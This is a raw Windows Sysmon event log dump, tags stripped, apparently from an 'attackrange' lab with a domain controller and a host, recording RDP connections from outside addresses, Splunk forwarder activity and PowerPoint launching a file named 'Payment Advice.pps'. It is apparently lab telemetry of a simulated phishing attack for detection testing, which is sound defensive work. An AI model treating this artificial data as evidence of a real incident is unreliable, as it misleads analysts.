SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63141-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000081670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:13.012{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9F348CBFBBD12204CBD9FEF37E3BC855,SHA256=95ABE238C3AD2A3DFB1D4A5D3C5F5933D9A5838C73B4C3C5DECF2F0C4205B05B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050752Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:13.834{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E5FE2843C485E67320817E9D3CE656D,SHA256=B2E46C5ACB5A185820E73B1CF032AF8396E596876B6A5A97BD7881769737EB24,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050751Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:11.234{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58325-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050750Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:13.209{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE4D2FDDD7D4B8251426EF102D3FC6B3,SHA256=ED52D8A8755BF11ECB1E7FA02BC4590D85F18B6B14860D5D68D77A0CFE1B084E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:14.981{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EEF59F5097B39126DB817252510EDDD,SHA256=3BAD46423CAF1776251407BA7F5F27D343682E0022AD9976499B2C3F3147BCA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:14.497{A7A01FEF-DF97-607E-4709-00000000BB01}6584ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6584.xml~RFd37dc8.TMPMD5=CDC37ABBACDC5A35D39581DFA1E69C56,SHA256=FD0C987C4EA499B0EF3F04D736EF983ED8B5570A1B8575164A63E0D9F0953E2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:12.486{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-4539-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000081677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:14.247{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB13B69B8BC9814D03C523759B6CAEC4,SHA256=151CA8F9ABE43E45DAF7BE03A110D32DDB1E360709355AC24C7BC632715BCFEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050755Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:12.866{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59800-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050754Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:12.697{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56851-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050753Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:14.256{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=328C0064ABB21F303CCB7444885E4B65,SHA256=B873937AB97FA76778BC49C82FCA47EA61D0BD73C2A747D32C7905CA5A3EC5F6,IMPHASH=00000000000000000000000000000000falsetrue 734700x800000000000000081805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.715{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEC:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBE7.DLL7.01.1106Visual Basic Design Time EnvironmentVisual Basic EnvironmentMicrosoft Corporation-MD5=0890BD3163852EDB987433AB40631B2B,SHA256=99E6A1505418EA2B1AD84DE8E49D72DA4BD29822EAB088B6CB3ADBBF5EA6532B,IMPHASH=150029E984790C7A698A8E7E9FD2048AtrueMicrosoft CorporationValid 23542300x800000000000000081804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.684{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=07B87D2396AAEB6B0DCBE333E136DC43,SHA256=654056775F81CC1D50D8D8F079E7201BE2571CA0C8A7B5BB59CEB97991CBC7F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.684{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FF63C514DCF4BE88CD84A92F11502D5,SHA256=5FD6C93907DBB7A8ECC3D508EC4320913F2591CF793C6DADE1E4B617107A89E3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000081802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.543{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnk2021-04-20 14:10:30.712 23542300x800000000000000081801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}836ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnkMD5=1FF810D96916191B1675D07DF16FB02B,SHA256=CB69B0D11F5595A6AD3651DF206FAAEBA00D4DC22715B8DF7BDC9A3F9BDC0BD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 11241100x800000000000000081787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Payment Advice.pps.lnk2021-04-20 14:59:15.528 10341000x800000000000000081786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+b91d7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5929b|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000081785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:15.528{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft 